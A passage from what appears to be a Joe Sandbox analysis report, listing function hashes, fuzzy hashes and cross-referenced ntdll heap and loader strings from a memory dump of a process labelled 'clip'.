                                                  • API ID: InitializeThunk
                                                  • String ID: This is located in the %s field of the heap header.$HEAP: $HEAP[%wZ]: $Heap %p - headers modified (%p is %lx instead of %lx)
                                                  • API String ID: 2994545307-336120773
                                                  • Opcode ID: 1251a8c0cba701d2cf7637ea0ffc27d7b78db2a920c4470ddc0c0c671117b1d4
                                                  • Instruction ID: e277a7d923c910396fc932a0222a9fc3ac40b15cc6e484224855167ea54222f5
                                                  • Opcode Fuzzy Hash: 1251a8c0cba701d2cf7637ea0ffc27d7b78db2a920c4470ddc0c0c671117b1d4
                                                  • Instruction Fuzzy Hash: 7B31C335210500EFEB20DB99C885FA7B3E8EF09768F146159E401DB2A2E675FC40EF55
                                                  Strings
                                                  • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 0437A992
                                                  • LdrpDynamicShimModule, xrefs: 0437A998
                                                  • apphelp.dll, xrefs: 04332462
                                                  • minkernel\ntdll\ldrinit.c, xrefs: 0437A9A2
                                                  Memory Dump Source
                                                  • Source File: 00000016.00000002.2534428283.00000000042E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 042E0000, based on PE: true
                                                  • Associated: 00000016.00000002.2534428283.0000000004409000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000016.00000002.2534428283.000000000440D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000016.00000002.2534428283.000000000447E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_22_2_42e0000_clip.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                  • API String ID: 0-176724104
                                                  • Opcode ID: 0a421cd1b9d2d06e29bb89d1f97cef9d5edca76e8ade8e96ec58fcaaaa5d3a31
                                                  • Instruction ID: 856b3d5f5e5f298bae8187df9689ee485e8eae312cb7a14a67aba568d088da6b
                                                  • Opcode Fuzzy Hash: 0a421cd1b9d2d06e29bb89d1f97cef9d5edca76e8ade8e96ec58fcaaaa5d3a31
                                                  • Instruction Fuzzy Hash: 73315B72700201EBEB30AF99DA81E6EBBF4FF85B14F265059E94167241D7787CA1CB40
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000016.00000002.2534428283.00000000042E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 042E0000, based on PE: true
                                                  • Associated: 00000016.00000002.2534428283.0000000004409000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000016.00000002.2534428283.000000000440D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000016.00000002.2534428283.000000000447E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_22_2_42e0000_clip.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: HEAP: $HEAP[%wZ]: $VirtualProtect Failed 0x%p %x$VirtualQuery Failed 0x%p %x
                                                  • API String ID: 0-1391187441
                                                  • Opcode ID: b1d50f1c2aa7e5b453c89269c4e2f20aa7c2467ac2fa0d0487c24572099b741d
                                                  • Instruction ID: 7df7eb52c33d8cdfb954f89620b7e4bda73fee15183a3ff66766d95fe7515666
                                                  • Opcode Fuzzy Hash: b1d50f1c2aa7e5b453c89269c4e2f20aa7c2467ac2fa0d0487c24572099b741d
                                                  • Instruction Fuzzy Hash: 0231DC72B10115AFDB01DB85C885FAAF7B9EF44B24F148161E821AB292D770F980CE60
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000016.00000002.2534428283.00000000042E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 042E0000, based on PE: true
                                                  • Associated: 00000016.00000002.2534428283.0000000004409000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000016.00000002.2534428283.000000000440D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000016.00000002.2534428283.000000000447E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_22_2_42e0000_clip.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: $ $0
                                                  • API String ID: 0-3352262554
                                                  • Opcode ID: d173d66befd6a11c611f95dd34162994993708e111cbcb94c2d4ead5992a1176
                                                  • Instruction ID: 28e16d1f40089a7ec599cf0bc62d43f678fce2eb757bda9de94cfc8f9063322d
                                                  • Opcode Fuzzy Hash: d173d66befd6a11c611f95dd34162994993708e111cbcb94c2d4ead5992a1176
                                                  • Instruction Fuzzy Hash: 0F3205B16083818FE360CF68C584B9BBBE5BF88344F04592DFAD987650D775E948CB92
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000016.00000002.2534428283.00000000042E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 042E0000, based on PE: true
                                                  • Associated: 00000016.00000002.2534428283.0000000004409000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000016.00000002.2534428283.000000000440D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000016.00000002.2534428283.000000000447E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_22_2_42e0000_clip.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                                  • API String ID: 0-4253913091
                                                  • Opcode ID: 5bd0ee06872d76956d6edbf35c7a5418608593aba09f9c85cc1c8763a772fb26
                                                  • Instruction ID: 206e3e071cf40ad6cc12e8ad17d8ffd6acb00332d3b5f9e779cac594420e84e7
                                                  • Opcode Fuzzy Hash: 5bd0ee06872d76956d6edbf35c7a5418608593aba09f9c85cc1c8763a772fb26
                                                  • Instruction Fuzzy Hash: 0DF1AB30700615EFEB28CF68CA84B6AB7B5FF44304F149168E6569BB91D738F985CB90
                                                  Strings
                                                  • HEAP: Free Heap block %p modified at %p after it was freed, xrefs: 04311728
                                                  • HEAP: , xrefs: 04311596
                                                  • HEAP[%wZ]: , xrefs: 04311712
                                                  Memory Dump Source
                                                  • Source File: 00000016.00000002.2534428283.00000000042E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 042E0000, based on PE: true
                                                  • Associated: 00000016.00000002.2534428283.0000000004409000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000016.00000002.2534428283.000000000440D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000016.00000002.2534428283.000000000447E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_22_2_42e0000_clip.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                                  • API String ID: 0-3178619729
                                                  • Opcode ID: 421a495ad31a4a4a2b5109f212f088e88ecb34f998e9e0edd4db884d3fd16f0f
                                                  • Instruction ID: be0d9b7dd21e45598f7254b50ba7a1f6c01dabd61ade9acac810f8db11f1fefe
                                                  • Opcode Fuzzy Hash: 421a495ad31a4a4a2b5109f212f088e88ecb34f998e9e0edd4db884d3fd16f0f
                                                  • Instruction Fuzzy Hash: 51E1F030A046429FDB29CF68C451BBABBF5AF48304F14E85DEA978B695E734F840DB50
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000016.00000002.2534428283.00000000042E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 042E0000, based on PE: true
                                                  • Associated: 00000016.00000002.2534428283.0000000004409000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000016.00000002.2534428283.000000000440D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000016.00000002.2534428283.000000000447E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_22_2_42e0000_clip.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: LdrResGetRCConfig Enter$LdrResGetRCConfig Exit$MUI
                                                  • API String ID: 0-1145731471
                                                  • Opcode ID: dce9ca2dfb698935b0e70dfd7c8df53e786f29ba44afa9e3d7154362d5c2fa35
                                                  • Instruction ID: a644dfcc1ae0acadfddc727a5be65dc25bd73f263abb17451b42d767ba3ddbb0
                                                  • Opcode Fuzzy Hash: dce9ca2dfb698935b0e70dfd7c8df53e786f29ba44afa9e3d7154362d5c2fa35
                                                  • Instruction Fuzzy Hash: C4B1D031A14644AFDB29CF69C980BADF3B5BF44714F14A829E891EB790E338F844CB10
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000016.00000002.2534428283.00000000042E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 042E0000, based on PE: true
                                                  • Associated: 00000016.00000002.2534428283.0000000004409000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000016.00000002.2534428283.000000000440D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000016.00000002.2534428283.000000000447E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_22_2_42e0000_clip.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: @$DelegatedNtdll$\SystemRoot\system32\
                                                  • API String ID: 0-2391371766
                                                  • Opcode ID: 1271998065de04ce7ff34e91b532bbc02503ffd8bcdd21b11b8cc0c3d93c50a9
                                                  • Instruction ID: 32a80e0b2fe032ddd64dd9d8c669a81b01cd46f84ab4bb51793909596fbf6377
                                                  • Opcode Fuzzy Hash: 1271998065de04ce7ff34e91b532bbc02503ffd8bcdd21b11b8cc0c3d93c50a9
                                                  • Instruction Fuzzy Hash: 0BB18AB2604741AFEB21DE54C880F6BB7E8EF48724F016929FE419B290D774FC548B92
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000016.00000002.2534428283.00000000042E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 042E0000, based on PE: true
                                                  • Associated: 00000016.00000002.2534428283.0000000004409000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000016.00000002.2534428283.000000000440D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000016.00000002.2534428283.000000000447E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_22_2_42e0000_clip.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID: FilterFullPath$UseFilter$\??\
                                                  • API String ID: 2994545307-2779062949
                                                  • Opcode ID: cf8f1f6e77e32f15c10ae9b05f72a6dae4b1f671a5522bcfd08a51eebf9ecd5c
                                                  • Instruction ID: a40df9e4ccb483d8230258d0477c73a3d24da3c2b30998a746a1b51bb6501c48
                                                  • Opcode Fuzzy Hash: cf8f1f6e77e32f15c10ae9b05f72a6dae4b1f671a5522bcfd08a51eebf9ecd5c
                                                  • Instruction Fuzzy Hash: 19A17B719016299BDB31DF64CC88BEEB7B8EF44704F1091E9E909A7250E735AE84CF50
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000016.00000002.2534428283.00000000042E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 042E0000, based on PE: true
                                                  • Associated: 00000016.00000002.2534428283.0000000004409000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000016.00000002.2534428283.000000000440D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000016.00000002.2534428283.000000000447E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_22_2_42e0000_clip.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: @$LdrpResMapFile Enter$LdrpResMapFile Exit
                                                  • API String ID: 0-318774311
                                                  • Opcode ID: f3b714d729618ebf1e7c8153d9f753ee9ac5e10b45dde3dd510308dcfb44bfae
                                                  • Instruction ID: 885c9b0832e34788efd01cd99b31a408b72372507a1031e09b9ff4ecb642fb13
                                                  • Opcode Fuzzy Hash: f3b714d729618ebf1e7c8153d9f753ee9ac5e10b45dde3dd510308dcfb44bfae
                                                  • Instruction Fuzzy Hash: F7818871648340AFE721DF24C844F6AB7E8EF85754F04292DFD819B390E775E9148B62
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000016.00000002.2534428283.00000000042E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 042E0000, based on PE: true
                                                  • Associated: 00000016.00000002.2534428283.0000000004409000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000016.00000002.2534428283.000000000440D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000016.00000002.2534428283.000000000447E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_22_2_42e0000_clip.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: Objects=%4u$Objects>%4u$VirtualAlloc
                                                  • API String ID: 0-3870751728
                                                  • Opcode ID: ece8ad6db0d06d7ecc12b521d4b63738f62c4c34f44c7a0cebd6b2c33430cc71
                                                  • Instruction ID: afed602cb4b19678a62632218586688af2b5dc54775d0163a03fb3bcdb26efb7
                                                  • Opcode Fuzzy Hash: ece8ad6db0d06d7ecc12b521d4b63738f62c4c34f44c7a0cebd6b2c33430cc71
                                                  • Instruction Fuzzy Hash: AD914AB0E10605DFEB58DF68C480BADBBF1BF48304F24916AE905AB391E775A842CF54
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000016.00000002.2534428283.00000000042E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 042E0000, based on PE: true
                                                  • Associated: 00000016.00000002.2534428283.0000000004409000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000016.00000002.2534428283.000000000440D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000016.00000002.2534428283.000000000447E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_22_2_42e0000_clip.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: LdrpResGetResourceDirectory Enter$LdrpResGetResourceDirectory Exit${
                                                  • API String ID: 0-373624363
                                                  • Opcode ID: 5478f60f4f981b32ec28e3ed78663bec6bd4843bb7e503757e5215029d8bf6c2
                                                  • Instruction ID: a537332878e44afe465c6a3e5a14b8d14b0a86e44ea753cca176bb7dd0367ccd
                                                  • Opcode Fuzzy Hash: 5478f60f4f981b32ec28e3ed78663bec6bd4843bb7e503757e5215029d8bf6c2
                                                  • Instruction Fuzzy Hash: CD91CF71E05659CFEB29CF58C440BAEB7B4EF14314F14A195EC52AB2A0D778B980DF90
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000016.00000002.2534428283.00000000042E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 042E0000, based on PE: true
                                                  • Associated: 00000016.00000002.2534428283.0000000004409000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000016.00000002.2534428283.000000000440D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000016.00000002.2534428283.000000000447E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_22_2_42e0000_clip.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: %$&$@
                                                  • API String ID: 0-1537733988
                                                  • Opcode ID: 6e7049deef332ebd88fc01ca7966d0d6c41c67481dbf9e94d7ffc72909b812fb
                                                  • Instruction ID: 584347ed419ae888cadb2f928abe452961b40f87d880496d7884b5064431099d
                                                  • Opcode Fuzzy Hash: 6e7049deef332ebd88fc01ca7966d0d6c41c67481dbf9e94d7ffc72909b812fb
                                                  • Instruction Fuzzy Hash: 8D71AEB06097059FD714DF24C980BABBBE9BFC9718F10A91DE4A647690D730F905CB52
                                                  Strings
                                                  • GlobalizationUserSettings, xrefs: 043EB834
                                                  • \Registry\Machine\SYSTEM\CurrentControlSet\Control\International, xrefs: 043EB82A
                                                  • TargetNtPath, xrefs: 043EB82F
                                                  Memory Dump Source
                                                  • Source File: 00000016.00000002.2534428283.00000000042E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 042E0000, based on PE: true
                                                  • Associated: 00000016.00000002.2534428283.0000000004409000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000016.00000002.2534428283.000000000440D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000016.00000002.2534428283.000000000447E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_22_2_42e0000_clip.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: GlobalizationUserSettings$TargetNtPath$\Registry\Machine\SYSTEM\CurrentControlSet\Control\International
                                                  • API String ID: 0-505981995
                                                  • Opcode ID: 92453194192f91625c36574a726f3d410036a67008c315c242eb6b75b64f3c4e
                                                  • Instruction ID: ffe1d9c46537387944b6faa69d1542197f62e6e3bc161f7693d4d126dedd6f26
                                                  • Opcode Fuzzy Hash: 92453194192f91625c36574a726f3d410036a67008c315c242eb6b75b64f3c4e
                                                  • Instruction Fuzzy Hash: 9D616172941239AFDB31DF55DC88BEAB7B8AF04714F0111E5A608A7291D774BE80CF90
                                                  Strings
                                                  • RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix), xrefs: 0436E6C6
                                                  • HEAP: , xrefs: 0436E6B3
                                                  • HEAP[%wZ]: , xrefs: 0436E6A6
                                                  Memory Dump Source
                                                  • Source File: 00000016.00000002.2534428283.00000000042E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 042E0000, based on PE: true
                                                  • Associated: 00000016.00000002.2534428283.0000000004409000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000016.00000002.2534428283.000000000440D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000016.00000002.2534428283.000000000447E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_22_2_42e0000_clip.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: HEAP: $HEAP[%wZ]: $RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix)
                                                  • API String ID: 0-1340214556
                                                  • Opcode ID: 03a6aedd94380b002821017c4621bfe0961277563599c8ba6ff0b3e47f588412
                                                  • Instruction ID: 6f1061beff91755ab1a12ffe609f61fac5ae68c01d89b2fe7e752fd214dc2db0
                                                  • Opcode Fuzzy Hash: 03a6aedd94380b002821017c4621bfe0961277563599c8ba6ff0b3e47f588412
                                                  • Instruction Fuzzy Hash: 7F51F435704A45EFE732DBA8C955BA6BBF8EF05304F04A1A4E5428B6D2E7B4F944CB10
                                                  Strings
                                                  • minkernel\ntdll\ldrmap.c, xrefs: 0437A59A
                                                  • LdrpCompleteMapModule, xrefs: 0437A590
                                                  • Could not validate the crypto signature for DLL %wZ, xrefs: 0437A589
                                                  Memory Dump Source
                                                  • Source File: 00000016.00000002.2534428283.00000000042E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 042E0000, based on PE: true
                                                  • Associated: 00000016.00000002.2534428283.0000000004409000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000016.00000002.2534428283.000000000440D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000016.00000002.2534428283.000000000447E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_22_2_42e0000_clip.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: Could not validate the crypto signature for DLL %wZ$LdrpCompleteMapModule$minkernel\ntdll\ldrmap.c
                                                  • API String ID: 0-1676968949
                                                  • Opcode ID: 5f3ef0d00000c55fb7f06ca09c2678503eb3bd751a1054e575e7fe9654bf7741
                                                  • Instruction ID: ce70c7458abe676079d26ad7d02997488c4dd3b86eecca00ca30a09c91b836cf
                                                  • Opcode Fuzzy Hash: 5f3ef0d00000c55fb7f06ca09c2678503eb3bd751a1054e575e7fe9654bf7741
                                                  • Instruction Fuzzy Hash: 4551F230704B459BFB21DFA8C944B2AB7E8AF00725F182168ED919B6E1D778FD40CB40
                                                  Strings
                                                  • Failed to reallocate the system dirs string !, xrefs: 043882D7
                                                  • minkernel\ntdll\ldrinit.c, xrefs: 043882E8
                                                  • LdrpInitializePerUserWindowsDirectory, xrefs: 043882DE
                                                  Memory Dump Source
                                                  • Source File: 00000016.00000002.2534428283.00000000042E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 042E0000, based on PE: true
                                                  • Associated: 00000016.00000002.2534428283.0000000004409000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000016.00000002.2534428283.000000000440D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000016.00000002.2534428283.000000000447E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_22_2_42e0000_clip.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                                  • API String ID: 0-1783798831
                                                  • Opcode ID: 581958830aa9de38860e340289999cd946042b40b6d37e604561dc3380739882
                                                  • Instruction ID: 19e90c73ef5c3118bedc23fff6e0458056ab0bafcc1667106e08714e13a5668f
                                                  • Opcode Fuzzy Hash: 581958830aa9de38860e340289999cd946042b40b6d37e604561dc3380739882
                                                  • Instruction Fuzzy Hash: 614122B1651300ABE720EB64DE40B9BBBE8EF85754F01692AB945D3290E774FC50CB91
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000016.00000002.2534428283.00000000042E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 042E0000, based on PE: true
                                                  • Associated: 00000016.00000002.2534428283.0000000004409000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000016.00000002.2534428283.000000000440D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000016.00000002.2534428283.000000000447E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_22_2_42e0000_clip.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: HEAP: $HEAP[%wZ]: $Invalid address specified to %s( %p, %p )
                                                  • API String ID: 0-1151232445
                                                  • Opcode ID: d1eae5e011667dfe7dd743af08ea4322ceb2c03a739380e3bef597e5b49f7735
                                                  • Instruction ID: 8dfdadf4799a8669e382d8033d1171739aaec5d0923ef83f36958c2d79747dd7
                                                  • Opcode Fuzzy Hash: d1eae5e011667dfe7dd743af08ea4322ceb2c03a739380e3bef597e5b49f7735
                                                  • Instruction Fuzzy Hash: 054104703006858FEB24EE5CC8A47BA77A49F02304F18E5ADD4479F68AD774F885CB52
                                                  Strings
                                                  • TlsVector %p Index %d : %d bytes copied from %p to %p, xrefs: 04381B39
                                                  • minkernel\ntdll\ldrtls.c, xrefs: 04381B4A
                                                  • LdrpAllocateTls, xrefs: 04381B40
                                                  Memory Dump Source
                                                  • Source File: 00000016.00000002.2534428283.00000000042E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 042E0000, based on PE: true
                                                  • Associated: 00000016.00000002.2534428283.0000000004409000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000016.00000002.2534428283.000000000440D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000016.00000002.2534428283.000000000447E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_22_2_42e0000_clip.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: LdrpAllocateTls$TlsVector %p Index %d : %d bytes copied from %p to %p$minkernel\ntdll\ldrtls.c
                                                  • API String ID: 0-4274184382
                                                  • Opcode ID: 34050967b60cd48759e8968ef511499362ecfa52d1684f0c86069229cb16ff3d
                                                  • Instruction ID: 5469300a9528c8d82caf7b19c36c67eb6b1809198728b74d8e22d2f5884e28b0
                                                  • Opcode Fuzzy Hash: 34050967b60cd48759e8968ef511499362ecfa52d1684f0c86069229cb16ff3d
                                                  • Instruction Fuzzy Hash: EC419D75A00608AFEB15DFA8C941BAEFBF5FF88714F149119E805A7650E778B850CF90
                                                  Strings
                                                  • @, xrefs: 043CC1F1
                                                  • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 043CC1C5
                                                  • PreferredUILanguages, xrefs: 043CC212
                                                  Memory Dump Source
                                                  • Source File: 00000016.00000002.2534428283.00000000042E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 042E0000, based on PE: true
                                                  • Associated: 00000016.00000002.2534428283.0000000004409000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000016.00000002.2534428283.000000000440D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000016.00000002.2534428283.000000000447E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_22_2_42e0000_clip.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
                                                  • API String ID: 0-2968386058
                                                  • Opcode ID: e94cb6f8b133b69ba145f77bc7966b2f7be9a0ec9f78b8d4d6278ee88c39418e
                                                  • Instruction ID: 3f38fc698578e54bd5d757a444bb1dc86bcb67ed2f900c4d860df44933d59c8b
                                                  • Opcode Fuzzy Hash: e94cb6f8b133b69ba145f77bc7966b2f7be9a0ec9f78b8d4d6278ee88c39418e
                                                  • Instruction Fuzzy Hash: E4414171E10219ABEF11DED4C851FEEB7B8AF14704F14616AE909A7290DB74BE44CB50
                                                  Strings
                                                  • LdrpCheckRedirection, xrefs: 0439488F
                                                  • minkernel\ntdll\ldrredirect.c, xrefs: 04394899
                                                  • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 04394888
                                                  Memory Dump Source
                                                  • Source File: 00000016.00000002.2534428283.00000000042E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 042E0000, based on PE: true
                                                  • Associated: 00000016.00000002.2534428283.0000000004409000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000016.00000002.2534428283.000000000440D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000016.00000002.2534428283.000000000447E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_22_2_42e0000_clip.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                                  • API String ID: 0-3154609507
                                                  • Opcode ID: 0f16890755074e6ab28549f1e6569a5cae4e2a447d1ce1ef0c4cf67cb3d07a4c
                                                  • Instruction ID: 1e07cc02b470e937a8903773da886cbf91719b68348f2c51bb21a687e8c8095a
                                                  • Opcode Fuzzy Hash: 0f16890755074e6ab28549f1e6569a5cae4e2a447d1ce1ef0c4cf67cb3d07a4c
                                                  • Instruction Fuzzy Hash: 8741EE32B1C6519BCF20CE69D940A26BBE8EFA9B54B061569EC59D7211E331FC12CB80
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000016.00000002.2534428283.00000000042E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 042E0000, based on PE: true
                                                  • Associated: 00000016.00000002.2534428283.0000000004409000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000016.00000002.2534428283.000000000440D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000016.00000002.2534428283.000000000447E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_22_2_42e0000_clip.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
                                                  • API String ID: 0-1373925480
                                                  • Opcode ID: 7c0e19c82abd145c4ea7ea1d3e07cb53aefd508539d5e72e3b35590fdfd7b464
                                                  • Instruction ID: 9613141982d59f7e3323da8f3dec15ec3519bfd192e09cdab225654089f93ca1
                                                  • Opcode Fuzzy Hash: 7c0e19c82abd145c4ea7ea1d3e07cb53aefd508539d5e72e3b35590fdfd7b464
                                                  • Instruction Fuzzy Hash: 3B414531A447688BEB21DFE4C944BADB7B8FF65348F14146AD802EB781E7B4B911CB10
                                                  Strings
                                                  • \Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\, xrefs: 0439B632
                                                  • @, xrefs: 0439B670
                                                  • GlobalFlag, xrefs: 0439B68F
                                                  Memory Dump Source
                                                  • Source File: 00000016.00000002.2534428283.00000000042E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 042E0000, based on PE: true
                                                  • Associated: 00000016.00000002.2534428283.0000000004409000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000016.00000002.2534428283.000000000440D000.00000040.00001000.00020000.00000000.sdmpDownload File
